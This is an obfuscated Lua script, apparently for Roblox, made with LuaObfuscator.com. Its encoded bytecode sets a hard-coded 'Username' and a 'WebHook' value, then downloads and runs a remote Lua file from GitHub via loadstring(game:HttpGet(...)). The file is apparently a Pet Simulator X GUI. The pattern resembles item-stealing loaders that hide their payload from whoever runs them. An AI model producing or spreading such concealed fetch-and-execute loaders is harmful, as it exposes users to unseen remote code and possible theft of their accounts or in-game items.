--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31)if (v1(v31,2)==79) then v20=v0(v3(v31,1,1));return "";else local v72=v2(v0(v31,16));if v20 then local v89=0;local v90;while true do if (v89==0) then v90=v5(v72,v20);v20=nil;v89=1;end if (v89==1) then return v90;end end else return v72;end end end);v21=nil;v18=1;end if (v18==1) then v21=function(v32,v33,v34)if v34 then local v73=(v32/((1 + 1)^(v33-(2 -1))))%((1062 -(747 + (2272 -(1615 + 344))))^(((v34-(1 + 0)) -(v33-(1 + 0))) + 1 + 0)) ;return v73-(v73%(1 + 0)) ;else local v74=(2 + 0)^(v33-(1 + 0)) ;return (((v32%(v74 + v74))>=v74) and (1 + 0)) or ((1752 + 6) -(1626 + 132)) ;end end;v22=nil;v22=function()local v39=v1(v16,v19,v19);v19=v19 + 1 ;return v39;end;v23=nil;v18=2;end if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v40=0 + 0 ;local v41;local v42;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v40==(1 + 1)) then v45=nil;v46=nil;v40=3;end if (v40~=(0 + 0)) then else v41=0 + 0 ;v42=nil;v40=1;end if (v40==3) then v47=nil;v48=nil;v40=1 + 3 ;end if (1==v40) then v43=nil;v44=nil;v40=9 -7 ;end if (v40==(625 -(235 + 386))) then while true do if (v41~=0) then else v42=0 -0 ;v43=nil;v41=1;end if (v41~=(8 -5)) then else v48=nil;while true do if (v42~=(1 + 0)) then else local v100=0 + 0 ;while true do if ((900 -(96 + 804))==v100) then v47=v24();v48={};v100=1;end if (2==v100) then v42=1 + 1 ;break;end if (1==v100) then for v105=1,v47 do local v106=0;local v107;local v108;while true do if ((0 -0)==v106) then v107=v22();v108=nil;v106=1;end if (v106~=1) then else if (v107==(1 + 0)) then v108=v22()~=(1373 -(260 + 1113)) ;elseif (v107==(1 + 1)) then v108=v25();elseif (v107~=3) then else v108=v26();end v48[v105]=v108;break;end end end v46[3]=v22();v100=2;end end end if (v42==2) then local v101=127 -(24 + 103) ;while true do if (v101~=0) then else for v109=1,v24() do local v110=0;local v111;local v112;local v113;while true do if (v110==(0 -0)) then v111=0 -0 ;v112=nil;v110=2 -1 ;end if (v110==1) then v113=nil;while true do if (v111~=0) then else local v145=905 -(26 + 879) ;while true do if (v145==0) then v112=0;v113=nil;v145=1 + 0 ;end if (v145~=(1 -0)) then else v111=1342 -(406 + 935) ;break;end end end if (1~=v111) then else while true do if (v112==(0 + 0)) then v113=v22();if (v21(v113,1,1)==(0 + 0)) then local v151=0;local v152;local v153;local v154;local v155;while true do if (v151==2) then while true do if (v152==(5 -2)) then if (v21(v154,2 + 1 ,841 -(751 + 87) )==1) then v155[17 -13 ]=v48[v155[4]];end v43[v109]=v155;break;end if (v152~=(1692 -(637 + 1054))) then else local v172=0;local v173;local v174;while true do if (v172~=0) then else v173=0;v174=nil;v172=2 -1 ;end if (v172==(2 -1)) then while true do if (v173==0) then v174=0 + 0 ;while true do if (v174==(1 + 0)) then v152=2;break;end if (v174==(0 + 0)) then local v185=0;local v186;while true do if ((1498 -(1197 + 301))~=v185) then else v186=0;while true do if (v186~=0) then else local v191=0;while true do if (1~=v191) then else v186=1;break;end if (v191==0) then v155={v23(),v23(),nil,nil};if (v153==0) then local v192=0 -0 ;local v193;local v194;local v195;while true do if (v192~=1) then else v195=nil;while true do if (v193==(1 + 0)) then while true do if (v194==(0 -0)) then v195=1205 -(528 + 677) ;while true do if (v195==(1483 -(839 + 644))) then v155[3]=v23();v155[40 -(18 + 18) ]=v23();break;end end break;end end break;end if (v193==(1850 -(686 + 1164))) then local v198=0;while true do if (v198==(3 -2)) then v193=1;break;end if (v198~=0) then else v194=0;v195=nil;v198=1 + 0 ;end end end end break;end if (v192==(0 + 0)) then v193=0 + 0 ;v194=nil;v192=1 -0 ;end end elseif (v153==1) then v155[7 -4 ]=v24();elseif (v153==(2 + 0)) then v155[7 -4 ]=v24() -((2 + 0)^(71 -55)) ;elseif (v153~=(12 -9)) then else local v199=0 -0 ;local v200;local v201;while true do if (v199==(919 -(212 + 706))) then while true do if ((0 -0)~=v200) then else v201=0;while true do if ((0 -0)==v201) then v155[3 + 0 ]=v24() -(2^(1942 -(1294 + 632))) ;v155[630 -(367 + 259) ]=v23();break;end end break;end end break;end if (v199==(0 + 0)) then v200=0;v201=nil;v199=1;end end end v191=1684 -(942 + 741) ;end end end if (v186==(1 -0)) then v174=1;break;end end break;end end end end break;end end break;end end end if ((1468 -(1130 + 336))~=v152) then else local v175=0 + 0 ;local v176;while true do if (v175==(0 + 0)) then v176=1231 -(590 + 641) ;while true do if ((1174 -(310 + 863))==v176) then v152=2 + 1 ;break;end if (v176==0) then local v184=0 -0 ;while true do if (v184==1) then v176=1;break;end if (v184~=0) then else if (v21(v154,1,1066 -(99 + 966) )~=(1 + 0)) then else v155[2]=v48[v155[2 -0 ]];end if (v21(v154,2,2 -0 )==(120 -(13 + 106))) then v155[3]=v48[v155[6 -3 ]];end v184=1;end end end end break;end end end if (v152==(0 + 0)) then local v177=0;while true do if (v177~=0) then else local v181=0 -0 ;while true do if (v181~=(0 + 0)) then else v153=v21(v113,5 -3 ,3);v154=v21(v113,6 -2 ,6);v181=132 -(37 + 94) ;end if (v181==(1 + 0)) then v177=2 -1 ;break;end end end if (v177~=1) then else v152=275 -(147 + 127) ;break;end end end end break;end if (v151~=0) then else local v162=0;while true do if (v162==(0 + 0)) then v152=0;v153=nil;v162=1274 -(304 + 969) ;end if ((651 -(232 + 418))~=v162) then else v151=1;break;end end end if ((1 + 0)~=v151) then else local v163=0;while true do if (v163==1) then v151=2;break;end if (v163==0) then v154=nil;v155=nil;v163=1315 -(1038 + 276) ;end end end end end break;end end break;end end break;end end end for v114=1,v24() do v44[v114-1 ]=v29();end v101=1;end if (v101==1) then for v116=1 + 0 ,v24() do v45[v116]=v24();end return v46;end end end if (v42==0) then v43={};v44={};v45={};v46={v43,v44,nil,v45};v42=1;end end break;end if (v41~=(1 + 1)) then else local v98=470 -(66 + 404) ;while true do if (v98~=1) then else v41=1557 -(1074 + 480) ;break;end if (v98==(0 -0)) then v46=nil;v47=nil;v98=1 -0 ;end end end if (v41==(89 -(22 + 66))) then local v99=0 + 0 ;while true do if (v99~=1) then else v41=2;break;end if (v99==(0 -0)) then v44=nil;v45=nil;v99=1;end end end end break;end end end;v18=5;end if (v18==3) then v25=function()local v49=v24();local v50=v24();local v51=1 + 0 ;local v52=(v21(v50,1 + 0 ,38 -18 ) * ((2 + 0)^(45 -13))) + v49 ;local v53=v21(v50,80 -59 ,178 -(38 + (770 -(550 + 111))) );local v54=((v21(v50,4 + 3 + 25 )==(2 -(1903 -(894 + 1008)))) and  -(2 -1)) or (1991 -(1317 + 673)) ;if (v53==0) then if (v52==0) then return v54 * (935 -(609 + 326)) ;else v53=1 -0 ;v51=401 -(281 + 120) ;end elseif (v53==(4928 -2881)) then return ((v52==(1825 -(1352 + 473))) and (v54 * ((1 + 0)/(1816 -(1187 + 629))))) or (v54 * NaN) ;end return v8(v54,v53-1023 ) * (v51 + (v52/((2 + 0)^52))) ;end;v26=nil;v26=function(v35)local v55=134 -(81 + 53) ;local v56;local v57;while true do if ((1 -0)==v55) then v56=v3(v16,v19,(v19 + v35) -(1 + 0) );v19=v19 + v35 ;v55=1 + 1 + 0 ;end if (v55==(0 -0)) then v56=nil;if  not v35 then local v93=0 -0 ;while true do if (v93==(0 -0)) then v35=v24();if (v35==(1569 -(1134 + 435))) then return "";end break;end end end v55=2 -1 ;end if (v55==((2 -0) + 1)) then return v6(v57);end if (v55==((402 -(329 + 70)) -(3 -2))) then v57={};for v91=1 + (1524 -(839 + 685)) , #v56 do v57[v91]=v2(v1(v3(v56,v91,v91)));end v55=640 -(273 + 364) ;end end end;v27=v24;v18=4;end if (v18==5) then v30=nil;v30=function(v36,v37,v38)local v58=v36[1];local v59=v36[2];local v60=v36[3];return function(...)local v67=1;local v68= -1;local v69={...};local v70=v12("#",...) -1 ;local function v71()local v75=v58;local v76=v59;local v77=v60;local v78=v28;local v79={};local v80={};local v81={};for v85=(484 -(410 + 74)) -0 ,v70 do if (((3798 -(7 + 847 + 901))<=(4509 -(531 + 447))) and (v85>=v77)) then v79[v85-v77 ]=v69[v85 + (3 -2) ];else v81[v85]=v69[v85 + (514 -(486 + 27)) ];end end local v82=(v70-v77) + 1 ;local v83;local v84;while true do local v86=0 -0 ;local v87;while true do if ((1780>=(938 + 46)) and (v86==(0 -0))) then v87=754 -(668 + 86) ;while true do if ((v87==(0 + 0)) or ((2276 -(156 + 268))>=4539)) then local v102=0 -0 ;local v103;while true do if (((1863 -(433 + 137))>(2998 -(54 + 146 + 1737))) and (v102==0)) then v103=0;while true do if ((v103==(1 + 0)) or (((31100 -24558) -(292 + 1361))<(1853 -902))) then v87=1161 -(504 + 656) ;break;end if ((((3698 -(61 + 691)) + (1891 -747))>(8177 -(936 + 4669))) and ((0 + 0)==v103)) then local v118=975 -(260 + 715) ;while true do if ((v118==(1 + 0)) or ((3296 -(792 + 5))>(2174 + 2338))) then v103=1750 -(5 + 1744) ;break;end if ((4780==((44851 -32074) -7997)) and (v118==(1303 -(46 + 1257)))) then v83=v75[v67];v84=v83[1];v118=902 -(568 + 333) ;end end end end break;end end end if ((v87==(1 + 0)) or ((3609 -(450 + 715))<=1813)) then if ((v84<=(1 + 1 + 2)) or ((265 + 25)>(6164 -(331 + 1021)))) then if ((v84<=(2 -(1 + 0))) or (3015<=704)) then if ((v84>(661 -(633 + 28))) or ((5120 -(435 + 290))==(6345 -2799))) then v67=v83[3];else v81[v83[4 -2 ]]=v38[v83[1062 -(883 + 176) ]];end elseif ((v84<=2) or (1030>=(2624 -(132 + 601)))) then v81[v83[1 + 1 ]]=v83[1 + 2 + 0 ];elseif ((v84==(5 -2)) or ((4294 -(468 + 1530))<(3379 -((683 -438) + 1460)))) then if ((2537==(12044 -9507)) and (v81[v83[2 + 0 ]]==v83[9 -5 ])) then v67=v67 + 1 ;else v67=v83[3 + 0 ];end else v81[v83[697 -(76 + 21 + 598) ]]();end elseif ((2755<=(6375 -(855 + 645))) and (v84<=7)) then if ((v84<=(657 -(618 + 34))) or ((8148 -6092)<=((3142 -(24 + 15)) -(2951 -(640 + 144))))) then v81[v83[(7 -5) -0 ]]=v83[(1368 -(83 + 1280)) -2 ]~=0 ;elseif (((50 -24)<((4221 -(1330 + 516)) + 482)) and (v84>(28 -22))) then do return;end else local v128=0 -0 ;local v129;local v130;local v131;local v132;local v133;local v134;while true do if (((3075 + 1746)>=(421 -(55 + 26))) and (v128==2)) then v133=nil;v134=nil;v128=198 -(154 + 41) ;end if ((v128==(6 -(13 -10))) or ((2258 -(7 + 4))==(5380 -(1136 + 279)))) then while true do if ((v129==0) or ((1387 + 1333)<=(5744 -3540))) then v130=0 -0 ;v131=nil;v129=1;end if ((2731<4316) and (v129==(410 -(207 + 202)))) then local v147=0 + 0 ;while true do if ((v147==(347 -(86 + 261))) or (((9847 -3415) -(294 + 1382))<=(298 + (12633 -10086)))) then v132=nil;v133=nil;v147=1 + 0 ;end if ((v147==1) or ((873 + 960)<=1298)) then v129=1520 -(1361 + 157) ;break;end end end if (((8473 -(124 + 3470))>=1736) and (v129==(888 -(99 + 27 + 760)))) then v134=nil;while true do if ((413<(5888 -(725 + 507))) and (v130==(2 + 0))) then for v164=v131,v68 do local v165=543 -(69 + 474) ;local v166;while true do if ((v165==((1599 -(848 + 53)) -((659 -(97 + 350)) + 486))) or ((3942 -(220 + 268))>=4901)) then v166=0;while true do if (((1065 -((73 -34) + 327))>(1662 -1309)) and (v166==0)) then v134=v134 + 1 + (0 -0) ;v81[v164]=v132[v134];break;end end break;end end end break;end if ((1==v130) or (((542 -(30 + 122)) + 1568)>=(9143 -5046))) then local v156=627 -(383 + 244) ;while true do if (((4593 -1555)==(5884 -2846)) and (v156==(1 + 0))) then v130=(2 + 0) -0 ;break;end if ((v156==((0 -0) + 0)) or ((3787 -(309 + 210))<(4034 -1233))) then local v167=0 -0 ;while true do if (((728 + 23)<=(335 + 1352)) and (v167==0)) then v68=(v133 + v131) -(1 + 0) ;v134=0 + 0 ;v167=1 + 0 ;end if ((v167==(237 -(165 + 71))) or ((13115 -(16122 -6808))<3136)) then v156=857 -(751 + 105) ;break;end end end end end if (((1168 -(375 + 793))==v130) or ((1853 -(1423 + 401))>(8955 -4084))) then local v157=687 -(260 + 427) ;while true do if (((1 -0)==v157) or ((1826 + 765)>4345)) then v130=1;break;end if (((1104 -633)==471) and (v157==(0 + 0))) then local v168=0 -0 ;while true do if ((v168==(1 + (1511 -(1310 + 201)))) or ((2375 + (2411 -1065))>=(901 + (4533 -(797 + 547))))) then v157=1 + 0 ;break;end if ((v168==(0 -0)) or (3718<((5807 -1814) -(166 + 633)))) then v131=v83[6 -4 ];v132,v133=v78(v81[v131](v13(v81,v131 + ((1016 -(711 + 76)) -(221 + 7)) ,v83[452 -(358 + 91) ])));v168=1 + 0 ;end end end end end end break;end end break;end if ((1323==(2626 -(483 + 820))) and (v128==(196 -(103 + 92)))) then v131=nil;v132=nil;v128=5 -(1198 -(753 + 442)) ;end if (((6095 -4473)>(813 -(49 + 173 + 360))) and (v128==(0 + 0))) then v129=0 + 0 ;v130=nil;v128=1489 -(748 + (1888 -(286 + 862))) ;end end end elseif (((30 + 52)<1176) and (v84<=8)) then v38[v83[1251 -(220 + 341 + 687) ]]=v81[v83[4 -2 ]];elseif ((v84==(923 -(327 + 587))) or ((1939 -1107)==((1386 -582) + 1204))) then local v135=0;local v136;local v137;while true do if ((v135==(0 -0)) or ((17308 -12946)>((2712 -(15 + 63)) + 1866))) then v136=1002 -(856 + 146) ;v137=nil;v135=474 -(35 + (1721 -(873 + 410))) ;end if ((v135==((1 + 0) -0)) or (((599 + 499) -(65 + 229))>=(1947 -(416 + 46)))) then while true do if ((((1884 -(942 + 346)) -339)<=2537) and (v136==0)) then v137=v83[9 -7 ];v81[v137]=v81[v137](v13(v81,v137 + ((985 -(828 + 156)) -0) ,v68));break;end end break;end end else local v138=(0 -0) + 0 ;local v139;local v140;local v141;local v142;while true do if ((v138==(5 -3)) or ((1227 + 132)<(836 -423))) then while true do if (((1876 -(111 + 867))>(616 -212)) and (((1441 -(936 + 72)) -(213 + (516 -(139 + 157))))==v139)) then local v150=824 -(755 + 69) ;while true do if ((v150==(0 -0)) or (320>(5424 -(343 + 624)))) then v140=0 -(0 -0) ;v141=nil;v150=3 -2 ;end if (((689 -(370 + 318))==v150) or ((4680 -(819 + 511))>3594)) then v139=2 -1 ;break;end end end if (((7059 -4335)<(4618 -(1174 + 691))) and ((342 -(292 + 49))==v139)) then v142=nil;while true do if ((812<=(1725 + 2506)) and (v140==1)) then v81[v141 + 1 + 0 ]=v142;v81[v141]=v142[v83[1090 -(450 + 636) ]];break;end if ((v140==(0 -0)) or ((2659 -(334 + (1012 -390)))<=1644)) then local v161=1596 -(1174 + 422) ;while true do if (((4116 -(392 + 922))<=(980 + 279 + 2672)) and (v161==(1108 -(307 + 801)))) then v141=v83[1 + 1 ];v142=v81[v83[3 + 0 ]];v161=(1 + 0) -0 ;end if (((3033 -(239 + (1429 -(799 + 622))))==(1189 + 1597)) and (v161==1)) then v140=1 + 0 ;break;end end end end break;end end break;end if ((v138==(2 -1)) or (37>2323)) then v141=nil;v142=nil;v138=3 -1 ;end if ((263<=(3595 -(1157 + 192))) and (v138==(0 -0))) then v139=0;v140=nil;v138=(2589 -(602 + 420)) -(281 + 336 + 949) ;end end end v67=v67 + (2 -1) ;break;end end break;end end end end A,B=v28(v11(v71));if  not A[1] then local v88=v36[4][v67] or "?" ;error("Script error at ["   .. v88   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end;return v30(v29(),{},v17)(...);end if (v18==2) then v23=function()local v61,v62=v1(v16,v19,v19 + (4 -2) );v19=v19 + (6 -4) ;return (v62 * 256) + v61 ;end;v24=nil;v24=function()local v63,v64,v65,v66=v1(v16,v19,v19 + (12 -9) );v19=v19 + (1744 -(82 + 1658)) ;return (v66 * (16778904 -(1674 + 14))) + (v65 * (311340 -(246237 -(59 + 374)))) + (v64 * (72 + 184)) + v63 ;end;v25=nil;v18=3;end end end v15("LOL!0B3O00028O0003083O00557365726E616D6503103O00506564726F42616261626F794O3703073O00576562482O6F6B03073O00776562682O6F6B026O00F03F030D3O006C6F6164696E677363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A757374616E6F74686572646D652F70657473696D782O322F6D61696E2F70657473696D6775692O732E6C756100163O0012023O00013O0026033O0008000100010004013O00080001001202000100033O001208000100023O001202000100053O001208000100043O0012023O00063O0026033O0001000100060004013O000100012O000500015O001208000100073O00122O000100083O00122O000200093O00200A00020002000A0012020004000B4O0006000200044O000900013O00022O00040001000100010004013O001500010004013O000100012O00073O00017O00163O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000B3O000B3O000B3O000B3O000B3O000B3O000B3O000C3O000D3O000F3O00",v9(),...);end
